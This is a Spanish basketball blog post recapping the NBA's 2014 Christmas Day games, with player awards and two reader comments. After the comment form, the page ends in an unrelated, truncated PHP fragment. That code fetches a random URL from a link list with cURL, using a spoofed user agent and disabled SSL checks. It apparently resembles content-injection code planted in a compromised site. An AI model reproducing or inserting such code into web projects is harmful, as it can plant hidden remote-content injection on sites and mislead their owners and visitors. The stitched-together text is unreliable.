La Crónica: Navidad jubilosa

26 de December de 2014 por txusma

¡Felices fiestas a todos! Antes de presentaros el asalto al Álamo de Russell Westbrook, el enfrentamiento de Pau Gasol contra sus ex-compañeros, a la exhibición de John Wall en el Madison, la segunda derrota consecutiva de los Warriors en el Staples y la vuelta fallidad a la que una vez fue su casa de Lebron James conviene ser educados y centrarnos en lo realmente importante. Esperamos que hayáis pasado una feliz Navidad en compañía de vuestras familias y que en caso de tenerlas, disfrutéis de las vacaciones. La NBA hizo su parte programando 5 partidazos.

Cavaliers 91 – Heat 101

Lebron James se abrazó con efusividad con todos sus ex-compañeros, en especial con Dwyane Wade, al principio y al final del partido pero se volvió a la que es actualmente su casa con una clara derrota bajo el brazo. Los Cavaliers tienen un problema muy gordo en defensa, sobretodo en la pintura. Los Heat no son un equipo muy fuerte en ese aspecto y menos con la baja de Chris Bosh pero ayer anotaron 44 puntos, incluidos 8 de los 10 últimos, cuando el partido estaba más apretado. Luol Deng y Wade también tuvieron mucha culpa. El primero por su completísimo partido y su buena defensa sobre Lebron, el segundo por los 24 puntos que anotó en la primera parte, como en los viejos tiempos. Con la baja de Varejao llega el momento de tomar decisiones en Cleveland. Se hace imprescindible el fichaje de un buen defensor interior. Permaneced atentos porque no creo que pasen mucho tiempo barajando nombres.

Thunder 114 – Spurs 106

Ambos equipos se presentaban con ausencias pero la de los Thunder parecía infinitamente más importante. Por tercer partido consecutivo Kevin Durant se quedaba en el banquillo por culpa de un esguince de tobillo. Enfrente, la baja del actual MVP de las finales, Kawhi Leonard, iba a ser solventada con el clásico juego tejano de pass, extra-pass y extra-extra-pass, esa maravilla que tanto nos asombra cuando la vemos poner en práctica. De todas maneras, los Spurs fueron siempre a remolque en el marcador y llegado el momento decisivo fueron incapaces de parar a un Russell Westbrook que acumula ya 10 partidos consecutivos anotando más de 25 puntos y que ya llevaba todo el partido estirando de los suyos. Con él a nivel MVP Durant puede descansar algo más tranquilo y procurar recuperarse para las batallas que están por venir.

Warriors 86 – Clippers 101

Segundo partido consecutivo en el Staples Center de Los Angeles y segunda derrota. Los Warriors no jugaron un buen partido y se quedaron en su anotación más baja de lo que va de curso producto de su horrible acierto en el tiro exterior. Los Clippers tampoco estuvieron muy sembrados pero se aprovecharon de la empanada visitante en el último cuarto lo que les permitió llevarse la victoria después de un par de derrotas fuera de casa. Seguramente es casualidad que los Warriors hayan perdido 2 partidos de los 3 que lleva disputados David Lee desde que volvió de su lesión…

Lakers 93 – Bulls 113

Todo el mundo contaba con que Kobe Bryant y Pau Gasol se reencontrarían en la pista pero finalmente, la estrella californiana se quedó en el banquillo descansado su maltrecho y cansado cuerpo. Mientras, el español dejó otra de esas grandes actuaciones que le pueden aupar a la titularidad en el quinteto del All-Star del Este. A su lado, un Derrick Rose que sin prisa pero sin pausa va mejorando partido a partido, y un Jimmy Butler que ha llegado para quedarse. Los Lakers plantaron cara hasta mediados del tercer cuarto pero allí se hundieron definitivamente. La maquinaria de Thibodeau va cogiendo poco a poco velocidad de crucero.

Wizards 102 – Knicks 92 

Y mientras John Wall proclamaba su reinado en el Madison Square Garden, Carmelo Anthony lo contemplaba de pie, junto a la mesa de anotadores, consternado, negando para si mismo la evidencia. Dicen que el árbitro llegó a lanzar el balón al aire pero la realidad es que en ningún momento hubo partido. Los Wizards dominaron de principio a fin y Wall solo paró de asombrarnos cuando Quincy Acy, harto de tanto humillación, le propinó una dura falta que acabó con los 2 jugadores enzarzados entre golpes y empujones. Acy acabó en el calle y Wall con una técnica sentado en el banco pero la misión ya estaba cumplida. Los Knicks siguen su particular carrera por convertirse en el peor equipo de la NBA.

PREMIOS

MVP: Nueva exhibición de Russell Westbrook. Ante los Spurs se fue a los 34 puntos, 11 asistencias, 5 rebotes y 5 robos. Ni toda la maquinaria tejana de los Spurs fue capaz de pararlo.

Sorpresa: Luol Deng (25-8-8) se destapó con el mejor partido del curso justo cuando le tocaba defender a Lebron. Sin embargo nos quedamos con los 16 puntos y 15 rebotes de Steven Adams ante Tim Duncan.

Decepción: Lo mejor que puede hacer Klay Thompson es olvidar cuanto antes su partido de ayer en Los Angeles. Anotó 15 puntos pero falló 8 de sus 10 lanzamientos desde la línea de 3 y perdió 3 balones.

Esfuerzo en vano: Lebron James consiguió 30 puntos y 8 asistencias a pesar de tener encima toda la noche a Luol Deng. Su retorno a Miami no fue tan triunfal como seguramente habría imaginado.

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Vaya tela John Wall, a que viene revolverse ahí con Acy?

    te ha hecho falta, la han pitado, pues ya está

      Citar

  2. Nacho dice:
    #2

    Anoche, en Memphis, Marc destapó las miserias de Howard, y Harden (y Rockets en general -atención a los nuevos-) destaparon las miserias de los Grizzlies. ¿Dónde estás Z-Bo?
    Qué bueno es ‘la barba’, y que superprotegido está por los árbitros. Si le aplicaran el mismo rasero en defensa, que cuando ataca, el partido no se hubiera ido a la prórroga. Pero que mano tiene!!!
    Habrá que ver si el plus que le dan Brewer y Smith a estos Rockets es suficiente para plantar cara en PO

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>